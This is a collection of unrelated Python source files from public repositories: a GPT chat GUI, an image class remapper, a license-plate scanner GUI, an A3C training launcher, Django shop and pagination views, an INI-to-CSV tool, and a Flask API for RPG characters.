#若从功能转导入,则为之前历史训练的延续,不需要添加prompt\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n elif chat_history_format == format_list[1]:\n #若从功能转导入,则为无prompt的对话。\n add_chat(\"\", chat_history, model_in_mode[selected_model], \"system\")\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n\n # 交给GPT回答\n answer = askGPT(messages=chat_history, MODEL=selected_model, MODEL_use_mode=chat_history_format,\n temperature=temperature, max_tokens=max_token)\n # AI回答\n add_chat(answer, chat_history, model_in_mode[selected_model], \"assistant\")\n else:\n # 报错显示格式有误\n Message_box.config(state=tk.NORMAL)\n Message_box.delete(\"1.0\", \"end\")\n Message_box.insert(tk.END, \"历史对话与模型不匹配\")\n Message_box.config(state=tk.DISABLED)\n Dialog_box.see(tk.END)\n\ndef sumbit_text(event):\n # -------------------------------提交用户输入参数----------------------------------------#\n text, temperature, max_token, selected_model, selected_prompt,\\\n selected_mode= submit_user_parameter()\n # -------------------------------------------------------------------------------------#\n # 如果对话记录为空,就初始化对话记录\n if chat_history == [] and selected_mode == mode_dict[0]:\n # 如果对话记录为空,就添加用户输入\n add_chat(prompts[selected_prompt],\n chat_history, model_in_mode[selected_model], \"system\")\n\n check_and_sendGPT(text, temperature, max_token, selected_model, selected_prompt,selected_mode)\n\n# 提交按钮\nsubmit_button = tk.Button(window,\n text=\"提交\",\n 
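# \"提交\" means \"Submit\" (button label)\n                          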
width=submit_button_size[0],\n height=submit_button_size[1],\n command=lambda: sumbit_text(None),\n )\n\n# 按钮的字体\nsubmit_button.config(\n font=(font_style, font_size),\n background=colors[6],\n activebackground=colors[3],\n foreground=colors[7],\n)\n\nif __name__ == \"__main__\":\n submit_button.grid(row=1, column=0, sticky=tk.NSEW)\n window.mainloop()\n","repo_name":"Code-WSY/GPT-SY","sub_path":"script/Bottom_Submit.py","file_name":"Bottom_Submit.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16656156330","text":"import argparse\nfrom pathlib import Path\n\nimport numpy as np\nimport ubelt as ub\nfrom imageio import imread, imwrite\nfrom tqdm import tqdm\nfrom safeforest.config import REMAP_MAP\n\n\"\"\"\nremap classes\n\"\"\"\n# Taken from https://www.geeksforgeeks.org/python-key-value-pair-using-argparse/\n# create a keyvalue class\nclass keyvalue(argparse.Action):\n # Constructor calling\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, dict())\n\n for value in values:\n # split it into key and value\n key, value = value.split(\"=\")\n # assign into dictionary\n getattr(namespace, self.dest)[int(key)] = int(value)\n\n\ndef remap_image(input_file: str, output_file: str, remap: str):\n \"\"\"Takes in a filename and writes out a remapped version\n\n Args:\n input_file: where to read the file from\n output_file: where to write the data to\n \"\"\"\n img = imread(input_file)\n remapped_img = remap[img].astype(np.uint8)\n ub.ensuredir(output_file.parents[0], mode=0o0755)\n imwrite(output_file, remapped_img)\n\n\ndef main(annotation_dir, output_dir, remap_name: str):\n \"\"\"\n remap_name: specifying the remapping strategy \n \"\"\"\n numpy_remap = REMAP_MAP[remap_name]\n\n input_files = list(annotation_dir.glob(\"**/*.png\"))\n output_files = [x.relative_to(annotation_dir) for x in input_files]\n output_files = [Path(output_dir, x) for x in output_files]\n [\n remap_image(i_f, o_f, numpy_remap)\n for i_f, o_f in tqdm(zip(input_files, output_files), total=len(input_files))\n ]\n\n\ndef merge_datasets(img_folders, ann_folders, output_folder):\n raise NotImplementedError()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Remap indices in a given dataset\")\n parser.add_argument(\n \"--annotation-dir\",\n type=Path,\n required=True,\n help=\"The top level directory containing all the annotations\",\n )\n parser.add_argument(\n \"--output-dir\",\n type=Path,\n required=True,\n help=\"Where to write the remapped data. 
The structure will be the same as the input\",\n    )\n    parser.add_argument(\"--remap-name\", choices=REMAP_MAP.keys())\n    args = parser.parse_args()\n    return args\n\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    main(args.annotation_dir, args.output_dir, args.remap_name)\n","repo_name":"russelldj/SafeForest","sub_path":"dev/dataset_creation/remap_dataset.py","file_name":"remap_dataset.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"22369611595","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\n\r\nfrom PIL import ImageTk, Image\r\n\r\nimport scanForPlateNumber as scanPlate\r\nimport database as database\r\ntitle=\"Number Plate Recognition\"\r\n\r\n\r\ndef ScanPage(frame, raised_frame, homePage):\r\n\r\n    heading = Label(frame, text=title, bg=\"#fff\", fg=\"#282935\", width=25, height=3, font=('arial', 25, 'bold'), )\r\n    heading.place(x=0, y=0)\r\n\r\n    backButton = Button(frame, text=\"Back\", bg=\"#fff\", fg=\"#282935\", width=5, font=('arial', 12, 'bold'),\r\n                        command=lambda: raised_frame(homePage))\r\n    backButton.place(x=50, y=460)\r\n\r\n    WIDTH = 300\r\n    HEIGHT = 300\r\n\r\n    imageLabel = Label(frame)\r\n    imageLabel.place(x=10, y=140)\r\n\r\n    def displayImage(filename):\r\n        if(filename):\r\n            IM = Image.open(filename).resize((WIDTH, HEIGHT), Image.ANTIALIAS)\r\n            # Creates a Tkinter-compatible photo image, which can be used everywhere Tkinter expects an image object.\r\n            img = ImageTk.PhotoImage(IM)\r\n            imageLabel.image = img # <== this is where we anchor the img object\r\n            imageLabel.configure(image=img)\r\n            dirLabel['text'] = filename\r\n            scanImageButton[\"state\"]=\"normal\"\r\n\r\n\r\n\r\n    def scanImage():\r\n        path = dirLabel['text']\r\n        print(scanPlate.main(path))\r\n        plateNumber = scanPlate.main(path)\r\n        plateLabel['text'] = plateNumber\r\n        seacrchDatabaseButton[\"state\"] = \"normal\"\r\n\r\n\r\n    def fileDialog():\r\n        filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select A File\", filetypes=\r\n        ((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\r\n        displayImage(filename)\r\n\r\n    def searchDatabase():\r\n        report, dates = database.search(plateLabel['text'])\r\n        if(report):\r\n\r\n            newWindow = Tk()\r\n            date_frame = Frame(newWindow, width=300, height=200, background=\"#282935\")\r\n            date_frame.place(x=330, y=60)\r\n            newWindow.wm_minsize(500, 300)\r\n            newWindow.wm_maxsize(500, 300)\r\n            newWindow.configure(background=\"#282935\", )\r\n\r\n            scroll = Scrollbar(date_frame)\r\n            scroll.pack(side=\"right\", fill=\"y\")\r\n\r\n            list = Listbox(date_frame, )\r\n            list.pack(side=\"left\", fill=\"y\")\r\n            newPlateLabel = Label(newWindow, text=\"LICENSE NUMBER:\", bg=\"#282935\", fg=\"#fff\",\r\n                                  font=('arial', 15, 'bold'))\r\n            newPlateLabel.place(x=20, y=10)\r\n            newPlateLabel = Label(newWindow, text=\"OWNER NAME:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n            newPlateLabel.place(x=20, y=70)\r\n            newPlateLabel = Label(newWindow, text=\"CAR NAME:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n            newPlateLabel.place(x=20, y=130)\r\n            newPlateLabel = Label(newWindow, text=\"DATE CREATED:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n            newPlateLabel.place(x=20, y=190)\r\n            newPlateLabel = Label(newWindow, text=\"VIEWED DATE:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n            
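# place the final header label; the matching values from the report row are rendered below\r\n            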
newPlateLabel.place(x=300, y=30)\r\n\r\n            newPlateLabelValue = Label(newWindow, text=report[0][0], bg=\"#282935\", fg=\"#aaa\",\r\n                                       font=('arial', 15, 'bold'))\r\n            newPlateLabelValue.place(x=40, y=40)\r\n            newPlateLabelValue = Label(newWindow, text=report[0][1], bg=\"#282935\", fg=\"#aaa\",\r\n                                       font=('arial', 15, 'bold'))\r\n            newPlateLabelValue.place(x=40, y=100)\r\n            newPlateLabelValue = Label(newWindow, text=report[0][2], bg=\"#282935\", fg=\"#aaa\",\r\n                                       font=('arial', 15, 'bold'))\r\n            newPlateLabelValue.place(x=40, y=160)\r\n            newPlateLabelValue = Label(newWindow, text=report[0][3], bg=\"#282935\", fg=\"#aaa\",\r\n                                       font=('arial', 15, 'bold'))\r\n            newPlateLabelValue.place(x=40, y=220)\r\n            a = 1\r\n            for data in dates:\r\n                list.insert(a, str(a) + \").  \" + data[0] + \"    \")\r\n                a = 1 + a\r\n\r\n            scroll.config(command=list.yview)\r\n            list.config(yscrollcommand=scroll.set)\r\n            newWindow.mainloop()\r\n\r\n            # messagebox.showinfo('Message', \"License number exists in database\")\r\n        else:\r\n            messagebox.showinfo('Message', \"License number is not in database\")\r\n\r\n\r\n        return\r\n\r\n\r\n    browseButton = Button(frame, text=\"Browse file\", bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n                          command=fileDialog)\r\n    browseButton.place(x=320, y=160)\r\n\r\n    scanImageButton = Button(frame, text=\"Scan Image For Plate\", state=DISABLED, bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n                             command=scanImage)\r\n    scanImageButton.place(x=320, y=200)\r\n\r\n    scanHeading = Label(frame, text=\"Plate Number:\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n    scanHeading.place(x=320, y=250)\r\n\r\n    plateLabel = Label(frame, text=\"\", bg=\"#282935\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n    plateLabel.place(x=320, y=280)\r\n\r\n    seacrchDatabaseButton = Button(frame, text=\"Search Database\", state=DISABLED, bg=\"#fff\", fg=\"#282935\", font=('arial', 12, 'bold'),\r\n                                   command=searchDatabase)\r\n    seacrchDatabaseButton.place(x=320, y=360)\r\n\r\n\r\n    dirLabel = Label(frame, text=\"\", fg=\"#fff\", font=('arial', 15, 'bold'))\r\n\r\n\r\n","repo_name":"EhisEA/license-plate-detector","sub_path":"Licensed Plate Recognition/scanImage.py","file_name":"scanImage.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"19111687858","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nfrom multiprocessing import RawArray, Barrier, Lock\nimport tensorflow as tf\nimport logging_utils\nimport time\nfrom shared_utils import SharedCounter, SharedVars\nimport ctypes\nimport argparse\nfrom policy_based_actor_learner import *\n\nlogger = logging_utils.getLogger('main')\n\n\ndef main(args):\n    logger.debug('Config: {}'.format(args))\n\n    \"\"\" Set up the graph, the agents, and run the agents in parallel. 
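Each actor-learner runs in its own process and coordinates through the shared counter, barrier, and shared optimizer state set up below. 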
\"\"\"\n    import atari_environment\n    num_actions, _, _ = atari_environment.get_actions(args.game)\n\n    args.summ_base_dir = 'train_data/sum_log/{}/{}'.format(args.game, time.time())\n\n    args.learning_vars = SharedVars(num_actions)\n    if args.opt_mode == 'shared':\n        args.opt_state = SharedVars(num_actions, opt_type=args.opt_type, lr=args.initial_lr)\n    else:\n        args.opt_state = None\n\n    args.cts_updated = RawArray(ctypes.c_int, args.num_actor_learners)\n    args.cts_lock = Lock()\n    args.cts_sync_steps = 20 * 30000 # @tensorflow-rl 20*q_target_update_steps\n\n    args.barrier = Barrier(args.num_actor_learners)\n    args.global_step = SharedCounter(0)\n    args.num_actions = num_actions\n\n    if (args.visualize == 2): args.visualize = 0\n    actor_learners = []\n    for i in range(args.num_actor_learners):\n        if (args.visualize == 2) and (i == args.num_actor_learners - 1):\n            args.visualize = 1\n\n        args.actor_id = i\n\n        actor_learners.append(A3CLearner(args))\n        actor_learners[-1].start()\n\n    for t in actor_learners:\n        t.join()\n\n    logger.debug('All training threads finished')\n    logger.debug('All threads stopped')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('game', help='Name of game')\n    parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n    parser.add_argument('-v', '--visualize', default=0, type=int,\n                        help='0: no visualization of emulator; 1: all emulators, for all actors, are visualized; 2: only 1 emulator (for one of the actors) is visualized. Default = 0',\n                        dest='visualize')\n\n    parser.add_argument('--opt_type', default='rmsprop',\n                        help='Type of optimizer: rmsprop, momentum, adam. Default = rmsprop', dest='opt_type')\n    parser.add_argument('--opt_mode', default='shared',\n                        help='Whether to use \\'local\\' or \\'shared\\' vector(s) for the moving average(s). Default = shared',\n                        dest='opt_mode')\n\n    # consistent with tensorflow beta1, beta2\n    parser.add_argument('--b1', default=0.9, type=float, help='beta1 for the Adam optimizer. Default = 0.9', dest='b1')\n    parser.add_argument('--b2', default=0.999, type=float, help='beta2 for the Adam optimizer. Default = 0.999',\n                        dest='b2')\n    # TODO @tensorpack AdamOptimizer's epsilon = 1e-3. tensorflow default is 1e-08\n    # TODO tensorflow default for RMSPropOptimizer is epsilon=1e-10\n    parser.add_argument('--e', default=0.001, type=float,\n                        help='Epsilon for the Rmsprop and Adam optimizers. Default = 1e-3', dest='e')\n    # TODO tensorflow default for RMSPropOptimizer is decay=0.9\n    parser.add_argument('--alpha', default=0.9, type=float,\n                        help='Discounting factor for the history/coming gradient, for the Rmsprop optimizer. Default = 0.9',\n                        dest='alpha')\n\n    parser.add_argument('-lra', '--lr_annealing_steps', default=80000000, type=int,\n                        help='Number of global steps during which the learning rate will be linearly annealed towards zero. Default = 80*10^6',\n                        dest='lr_annealing_steps')\n    parser.add_argument('-n', '--num_actor_learners', default=16, type=int,\n                        help='number of actors (processes). Default = 16', dest='num_actor_learners')\n    parser.add_argument('--max_global_steps', default=80000000, type=int,\n                        help='Max number of training steps. 
Default = 80*10^6', dest='max_global_steps')\n\n args = parser.parse_args()\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n args.initial_lr = 0.001 # tensorpack\n args.max_local_steps = 32 # @lezhang batch_size\n\n args.opt_type = 'rmsprop'\n args.opt_mode = 'shared'\n args.e = 1e-3\n\n args.alg_type = 'a3c'\n args.gamma = 0.99\n main(args)\n","repo_name":"lezhang-thu/rlearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25727344825","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n# Create your views here.\n\n\ndef root(request):\n if 'username' in request.session:\n logged_user = User.objects.get(id=request.session['userid'])\n context = {\n 'paints': Paint.objects.all(),\n 'userpaints': logged_user.purchased_paints.all()\n }\n\n return render(request, 'index.html', context)\n else:\n return redirect('/loginpage')\n\n\ndef loginpage(request):\n return render(request, 'loginpage.html')\n\n\ndef signup(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/loginpage')\n else:\n password = request.POST['password']\n pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()\n User.objects.create(first_name=request.POST['fname'],\n last_name=request.POST['lname'],\n email=request.POST['email'],\n password=pw_hash)\n request.session['username'] = User.objects.last(\n ).first_name + \" \" + User.objects.last().last_name\n request.session['userid'] = User.objects.last().id\n\n return redirect('/success')\n\n\ndef signin(request):\n user = User.objects.filter(email=request.POST['email'])\n if user:\n if bcrypt.checkpw(request.POST['password'].encode(), user[0].password.encode()):\n request.session['username'] = user[0].first_name + \\\n ' ' + user[0].last_name\n request.session['userid'] = user[0].id\n return redirect('/success')\n else:\n messages.error(request, \"Wrong Password\")\n return redirect('/loginpage')\n else:\n messages.error(request, \"Email not found in the database\")\n return redirect('/loginpage')\n\n\ndef success(request):\n if 'username' in request.session:\n return redirect('/')\n else:\n return redirect('/loginpage')\n\n\ndef logout(request):\n request.session.flush()\n return redirect('/')\n\n\ndef addpainting(request):\n\n if 'username' in request.session:\n return render(request, \"addpaint.html\")\n else:\n return redirect('/')\n\n\ndef addpaintsubmit(request):\n errors = Paint.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/addpainting')\n else:\n logged_user = User.objects.get(id=request.session['userid'])\n Paint.objects.create(title=request.POST['title'],\n desc=request.POST['desc'],\n price=request.POST['price'],\n qts=request.POST['qts'],\n add_by=logged_user)\n return redirect('/')\n\n\ndef edit(request, id):\n if 'username' in request.session:\n context = {\n 'paint': Paint.objects.get(id=id)\n }\n return render(request, 'editpaint.html', context)\n else:\n return redirect('/')\n\n\ndef editsubmit(request, id):\n if 'username' in request.session:\n if int(request.session['userid']) == Paint.objects.get(id=id).add_by.id:\n errors = 
Paint.objects.basic_validator(request.POST)\n            if len(errors) > 0:\n                for key, value in errors.items():\n                    messages.error(request, value)\n                return redirect('/paint/'+str(id)+'/edit')\n            else:\n                paint = Paint.objects.get(id=id)\n                paint.title = request.POST['title']\n                paint.desc = request.POST['desc']\n                paint.price = request.POST['price']\n                paint.qts = request.POST['qts']\n                paint.save()\n        return redirect('/paint/'+str(id))\n    else:\n        return redirect('/')\n\n\ndef delete(request, id):\n    if 'username' in request.session:\n        if int(request.session['userid']) == Paint.objects.get(id=id).add_by.id:\n            paint = Paint.objects.get(id=id)\n            paint.delete()\n            return redirect('/')\n        else:\n            return redirect('/')\n    else:\n        return redirect('/')\n\n\ndef paintdetails(request, id):\n    if 'username' in request.session:\n        paint = Paint.objects.get(id=id)\n        numberOfPurchase = len(\n            list(Paint.objects.get(id=id).purchased_by.all()))\n        paint_qts = int(paint.qts)\n        context = {\n            'paint': paint,\n            'buyable': paint_qts > numberOfPurchase,\n            'numberOfPurchase': numberOfPurchase,\n        }\n        return render(request, 'paint.html', context)\n    else:\n        return redirect('/')\n\n\ndef buy(request, id):\n    paint = Paint.objects.get(id=id)\n    logged_user = User.objects.get(id=request.session['userid'])\n    paint.purchased_by.add(logged_user)\n    return redirect('/')\n","repo_name":"Mahdi-Saqqa/python-exam","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"19840166761","text":"# Author: Soumil Datta\nfrom typing import Dict, List\nimport os\nimport sys\n\nmasterHeaderList = ['INIFileName']\n\ndef _getMasterHeaderListFromINI(fileList: List[str]) -> List[str]:\n    '''Make a pass through all files adding to the master header list'''\n    for inputFile in fileList:\n        with open(inputFile) as currentFile:\n            for line in currentFile:\n                key = line.split(\"=\")[0].strip()\n                if not key in masterHeaderList:\n                    masterHeaderList.append(key)\n    return masterHeaderList\n\n\ndef _getValueDictFromINI(filename: str) -> Dict[str, str]:\n    '''Returns a string list of the values in a specified ini file'''\n    fileDict = {}\n    with open(filename) as inputFile:\n        for line in inputFile:\n            entry = line.split('=')\n            key = entry[0].strip()\n            value = entry[1].strip()\n            fileDict[key] = value\n    return fileDict\n\n\ndef _formatCSVLine(list: List[str]) -> str:\n    '''Adds the proper commas and spaces to a list of strings'''\n    string = list[0]\n    for i in range(1, len(list)):\n        string += f\", {list[i]}\"\n    return string\n\n\ndef _processValueDictToString(filename: str, valueDict: Dict[str, str]) -> str:\n    '''Uses the key, value dictionary to check against the masterHeaderList and output the string'''\n    string = filename\n    for i in range(1, len(masterHeaderList)):\n        key = masterHeaderList[i]\n        # add nothing if value does not exist for key\n        string += f\", {valueDict.get(key, '')}\"\n    return string\n\ndef _write_to_csv(outputFile: str, fileList: List[str]):\n    '''Writes entries for each file into the output CSV file'''\n    with open(outputFile, 'w') as outputFile:\n        outputFile.write(_formatCSVLine(_getMasterHeaderListFromINI(fileList)))\n        outputFile.write('\\n')\n\n        for inputFile in fileList:\n            # Get the filename for the first column\n            filename = inputFile.split('/')[1]\n            valueDict = _getValueDictFromINI(inputFile)\n            outputFile.write(_processValueDictToString(filename, valueDict))\n            outputFile.write('\\n')\n\ndef process_folder(folder_name: str, 
output_filename: str):\n    '''Processes a folder of .ini files into an output .csv file'''\n    files = [f'{folder_name}/{file}' for file in os.listdir(folder_name)]\n    _write_to_csv(output_filename, files)\n\ndef process_files(file_names: List[str], output_filename: str):\n    '''Process a list of .ini files into an output .csv file'''\n    _write_to_csv(output_filename, file_names)","repo_name":"soumildatta/ini2csv","sub_path":"ini2csv/ini2csv.py","file_name":"ini2csv.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"40511547073","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.core.paginator import Paginator\n\nimport csv\n\n\nclass Station:\n    def __init__(self, name, street, district):\n        self.Name = name\n        self.Street = street\n        self.District = district\n\n\ndef index(request):\n    return redirect(reverse('bus_stations'))\n\n\ndef bus_stations(request):\n    # get the current page and pass it to the context\n    # also pass the list of stations on that page to the context\n    bus_stations = []\n\n    with open(settings.BUS_STATION_CSV, encoding='utf-8') as f:\n        reader = csv.DictReader(f)\n        for row in reader:\n            bus_stations.append(Station(row['Name'], row['Street'], row['District']))\n\n    page_number = int(request.GET.get('page', default=1))\n    paginator = Paginator(bus_stations, 10)\n    page = paginator.get_page(page_number)\n    \n    context = {\n        'bus_stations': page,\n        'page': page,\n    }\n\n    return render(request, 'stations/index.html', context)\n","repo_name":"ablsft/dj-homeworks","sub_path":"1.2-requests-templates/pagination/stations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"26801252007","text":"from flask import jsonify, url_for, request, g, abort\nfrom app import db\nfrom app.models import Usuario, Personaje, HabilidadBase, HabilidadPersonaje\nfrom app.api.v1 import bp\nfrom app.api.v1.errores import peticion_erronea\nfrom app.api.v1.auth import token_auth\nfrom app.api.v1.firebase import Firebase\n\n\n'''\n    End point: Obtener personaje\n    @param: URL => idPersonaje, id del personaje.\n    @return: Response => datos del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>', methods=['GET'])\n@token_auth.login_required\ndef obtener_personaje(idPersonaje):\n    return jsonify(Personaje.query.get_or_404(idPersonaje).to_dict())\n\n\n'''\n    End point: Obtener todas las habilidades del personaje\n    @param: URL => idPersonaje, id del personaje.\n    @return: Response => datos de todas las habilidades del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>/habilidades', methods=['GET'])\n@token_auth.login_required\ndef obtener_habilidades_personaje(idPersonaje):\n    habilidades = Personaje.query.get_or_404(idPersonaje).habilidades\n    respuesta = []\n    for habilidad in habilidades:\n        hb = HabilidadBase.query.filter_by(idHabilidad = habilidad.habilidad_id).first()\n        dato = {\n            'idHabilidadPersonaje': habilidad.idHabilidadPersonaje,\n            'idHabilidad': habilidad.habilidad_id,\n            'idPersonaje': habilidad.personaje_id,\n            'nombre': hb.nombre,\n            'bonusPrincipal': hb.bonusPrincipal,\n            'bonusSecundario': hb.bonusSecundario,\n            'combate': hb.combate,\n            'tipo': hb.tipo,\n            'valorBase': habilidad.valorBase,\n            'pap': habilidad.pap,\n            'extra': habilidad.extra,\n            'habilidadUsada': habilidad.habilidadUsada,\n        }\n        
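# one entry per skill the character has learned\n        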
respuesta.append(dato)\n    return jsonify(respuesta)\n\n\n'''\n    End point: Obtener una habilidad del personaje\n    @param: URL => idPersonaje, id del personaje.\n    @param: URL => idHabilidadPersonaje, id de la habilidad del personaje.\n    @return: Response => datos de la habilidad del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>/habilidades/<int:idHabilidadPersonaje>', methods=['GET'])\n@token_auth.login_required\ndef obtener_habilidad_personaje(idPersonaje, idHabilidadPersonaje):\n    personaje = Personaje.query.get_or_404(idPersonaje)\n    habilidad = HabilidadPersonaje.query.get_or_404(idHabilidadPersonaje) or None\n    if g.usuario_actual.idUsuario != personaje.usuario_id:\n        abort(403)\n    if personaje is None:\n        return peticion_erronea('El personaje no existe.')\n    if habilidad is None:\n        return peticion_erronea('El personaje aún no ha aprendido esta habilidad.')\n    else:\n        respuesta = jsonify(habilidad.to_dict())\n        respuesta.status_code = 201\n        respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n            idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n        return respuesta\n\n\n'''\n    End point: Obtener todos los personajes del usuario.\n    @return: Response => datos de todos los personajes del usuario en formato JSON.\n'''\n@bp.route('/personajes', methods=['GET'])\n@token_auth.login_required\ndef obtener_personajes():\n    personajes = Personaje.query.filter_by(\n        usuario_id=g.usuario_actual.idUsuario)\n    respuesta = []\n    for personaje in personajes:\n        respuesta.append(personaje.to_dict())\n    return jsonify(respuesta)\n\n\n'''\n    End point: Crear un personaje\n    @param: Body => datos del personaje en formato JSON.\n    @return: Response => datos del personaje en formato JSON.\n'''\n@bp.route('/personajes', methods=['POST'])\n@token_auth.login_required\ndef crear_personaje():\n    datos = request.get_json() or {}\n    if 'nombre' not in datos:\n        return peticion_erronea('Debe incluir el campo nombre.')\n    if Personaje.query.filter_by(nombre=datos['nombre'], idUsuario=g.usuario_actual.idUsuario).first():\n        return peticion_erronea('El usuario ya tiene un personaje con este nombre.')\n    datos['idPersonaje'] = Firebase.firebase_crear_personaje(datos)\n    personaje = Personaje()\n    personaje.from_dict(datos, g.usuario_actual.idUsuario)\n    db.session.add(personaje)\n    db.session.commit()\n    Firebase.firebase_actualizar_usuario_personajes(Usuario.query.get_or_404(g.usuario_actual.idUsuario).personajes)\n    respuesta = jsonify(personaje.to_dict())\n    respuesta.status_code = 201\n    respuesta.headers['Location'] = url_for('api.obtener_personaje', idPersonaje=personaje.idPersonaje)\n    return respuesta\n\n\n'''\n    End point: Aprender una habilidad el personaje\n    @param: URL => idPersonaje, id del personaje.\n    @param: URL => idHabilidad, id de la habilidad base a aprender.\n    @return: Response => datos de la nueva habilidad del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>/habilidades/<int:idHabilidad>', methods=['POST'])\n@token_auth.login_required\ndef aprender_habilidades(idPersonaje, idHabilidad):\n    personaje = Personaje.query.get_or_404(idPersonaje)\n    if g.usuario_actual.idUsuario != personaje.usuario_id:\n        abort(403)\n    if personaje is None:\n        return peticion_erronea('El personaje no existe.')\n    if not HabilidadBase.query.filter_by(idHabilidad=idHabilidad).first():\n        return peticion_erronea('La habilidad no existe.')\n    datos = request.get_json() or {}\n    if 'valorBase' not in datos or 'pap' not in datos or 'extra' not in datos or 'habilidadUsada' not in datos:\n        return peticion_erronea('Debe incluir los campos 
valorBase, pap, extra y habilidadUsada.')\n    datos['personaje_id'] = idPersonaje\n    datos['habilidad_id'] = idHabilidad\n    habilidad = HabilidadPersonaje()\n    if habilidad.conocer_habilidad(datos):\n        return peticion_erronea('El personaje ya ha aprendido esta habilidad anteriormente.')\n    else:\n        datos['idHabilidadPersonaje'] = Firebase.firebase_crear_habilidad(datos)\n        habilidad.from_dict(datos)\n        print(habilidad)\n        db.session.add(habilidad)\n        db.session.commit()\n        respuesta = jsonify(habilidad.to_dict())\n        respuesta.status_code = 201\n        respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n            idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n        return respuesta\n\n\n'''\n    End point: Actualizar personaje\n    @param: URL => idPersonaje, id del personaje.\n    @return: Response => datos actualizados del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_personaje(idPersonaje):\n    personaje = Personaje.query.get_or_404(idPersonaje)\n    if g.usuario_actual.idUsuario != personaje.usuario_id:\n        abort(403)\n    datos = request.get_json() or {}\n    if 'idPersonaje' in datos:\n        return peticion_erronea('No se puede cambiar el id del Personaje.')\n    personaje.from_dict(datos, personaje.usuario_id)\n    Firebase.firebase_actualizar_personaje(personaje)\n    db.session.commit()\n    return jsonify(personaje.to_dict())\n\n\n'''\n    End point: Actualizar habilidad del personaje\n    @param: URL => idPersonaje, id del personaje.\n    @param: URL => idHabilidadPersonaje, id de la habilidad del personaje.\n    @return: Response => datos de la habilidad actualizada del personaje en formato JSON.\n'''\n@bp.route('/personajes/<int:idPersonaje>/habilidades/<int:idHabilidadPersonaje>', methods=['PUT'])\n@token_auth.login_required\ndef actualizar_habilidades(idPersonaje, idHabilidadPersonaje):\n    personaje = Personaje.query.get_or_404(idPersonaje) or None\n    habilidad = HabilidadPersonaje.query.get_or_404(idHabilidadPersonaje) or None\n    if g.usuario_actual.idUsuario != personaje.usuario_id:\n        abort(403)\n    if personaje is None:\n        return peticion_erronea('El personaje no existe.')\n    datos = request.get_json() or {}\n    if not ('valorBase' in datos or 'pap' in datos or 'extra' in datos or 'habilidadUsada' in datos):\n        return peticion_erronea('Debe incluir algunos de estos campos: valorBase, pap, extra o habilidadUsada.')\n    if habilidad is None:\n        return peticion_erronea('El personaje aún no ha aprendido esta habilidad.')\n    else:\n        habilidad.from_dict(datos)\n        Firebase.firebase_actualizar_habilidad(datos)\n        respuesta = jsonify(habilidad.to_dict())\n        respuesta.status_code = 201\n        respuesta.headers['Location'] = url_for('api.obtener_habilidad_personaje',\n            idPersonaje=habilidad.personaje_id, idHabilidadPersonaje = habilidad.idHabilidadPersonaje)\n        return 